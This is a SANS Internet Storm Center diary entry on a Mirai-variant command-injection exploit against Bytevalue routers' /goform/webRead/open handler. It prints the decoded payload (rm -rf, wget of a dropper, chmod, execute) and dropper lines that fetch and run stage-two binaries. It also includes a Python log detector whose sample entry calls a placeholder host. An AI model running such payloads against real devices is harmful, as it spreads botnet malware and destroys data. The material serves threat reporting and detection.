Exploit against Unnamed “Bytevalue” router vulnerability included in Mirai Bot, (Mon, Feb 12th)

Today, I noticed the following URL showing up in our “First Seen” list:


Initially, our sensors detected requests for just “goform/webRead/open”. 


Bytevalue Login page from bytevalue.com

URLs containing “goform” are typically associated with the RealTek SDK. Routers built around the RealTek SoC (System on a Chip) usually use the SDK to implement web-based access tools. The RealTek SDK had numerous vulnerabilities in the past. We currently track over 900 unique URLs in our honeypots using a “/goform/” URL. The most popular URL is usually “goform/set_LimitClient_cfg”, associated with CVE-2023-26801 in LB-Link routers. But simple password brute force attacks are also common, taking advantage of default passwords.


So far, I have not been able to identify a specific CVE number for vulnerabilities related to “goform/webRead/open”. However, a Chinese blog post from November [1] suggests that this is related to a vulnerability in routers made by the Chinese company “BYTEVALUE.” I could not find a patch for the vulnerability.

The exploit attempt in the URL above follows the standard command injection pattern. URL-decoding the payload yields:

rm -rf *; cd /tmp; wget; chmod 777 bruh.sh; ./bruh.sh

With “bruh.sh” being the typical shell script downloading the next stage for various architectures:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol; chmod +x lol; ./lol 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao; chmod +x lmao; ./lmao 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw; chmod +x kekw; ./kekw 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what; chmod +x what; ./what 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys; chmod +x kys; ./kys 0day_router
[I removed various versions that used offensive filenames]
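To pick this two-stage pattern (a bare probe of the handler, then a percent-encoded command injection) out of ordinary web-server access logs, here is an added Python example; it is my illustration, not code from the diary or from ISC. The log lines are constructed, the query parameter name "path" and the download host example.invalid are placeholders (the diary redacts the real download URL), and the decoded command is the one shown above.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real sensor data). The query parameter
# name "path" and the download host example.invalid are placeholders; the
# diary redacts the real download URL and the parameter name is unknown.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Feb/2024:10:01:02 +0000] "GET /goform/webRead/open HTTP/1.1" 404 162
203.0.113.5 - - [12/Feb/2024:10:01:03 +0000] "GET /goform/webRead/open?path=%3Brm%20-rf%20*%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2Fexample.invalid%2Fbruh.sh%3B%20chmod%20777%20bruh.sh%3B%20.%2Fbruh.sh HTTP/1.1" 404 162
198.51.100.7 - - [12/Feb/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""

# Request line inside a common/combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A shell separator followed by one of the commands seen in this dropper chain.
INJECTION_RE = re.compile(r'(?:;|\|\||&&|`|\$\()\s*(?:rm|cd|wget|curl|chmod|sh|\./)\b')
# Download URL handed to wget/curl (optionally after "-O name"), stopping at the next separator.
DOWNLOAD_RE = re.compile(r'(?:wget|curl)\s+(?:-[A-Za-z]+\s+\S+\s+)?(https?://[^\s;|&]+)')


def decode_target(target):
    """URL-decode a request target; the injected command arrives percent-encoded."""
    return unquote(target)


def find_goform_injections(log_text):
    """Return [(line_no, decoded_target)] for /goform/ requests whose decoded
    target carries a shell-injection pattern. A bare probe of the handler with
    no payload (the first request the sensors saw) is deliberately not flagged."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = decode_target(m.group("target"))
        if "/goform/" in decoded and INJECTION_RE.search(decoded):
            hits.append((n, decoded))
    return hits


def extract_download_urls(decoded_target):
    """Pull the stage-two download URL(s) out of a decoded injection string,
    which is what a defender would feed to a block list or a sandbox."""
    return DOWNLOAD_RE.findall(decoded_target)


if __name__ == "__main__":
    for line_no, decoded in find_goform_injections(SAMPLE_LOG):
        print(f"line {line_no}: {decoded}")
        print("  downloads:", extract_download_urls(decoded))
```

The same DOWNLOAD_RE also handles the "wget -O name URL" form used in the dropper script above, so it can be run over a recovered bruh.sh to list every stage-two URL.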

The binary is simply UPX-packed. The binary contains strings pointing to other router exploits and paths in “/home/landley/”, which may indicate the system the binary was compiled on.

VirusTotal did not have a sample yet when I uploaded mine [2]. However, the sample is now widely recognized as a “Mirai” variant, which appears correct.

[1] https://blog.csdn.net/zkaqlaoniao/article/details/134328873
[2] https://www.virustotal.com/gui/file/0d0f841ff15c3a01e5376ec7453c2465ec87a9450a21053c3ab4fcb9bbbe1605?nocache=1

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.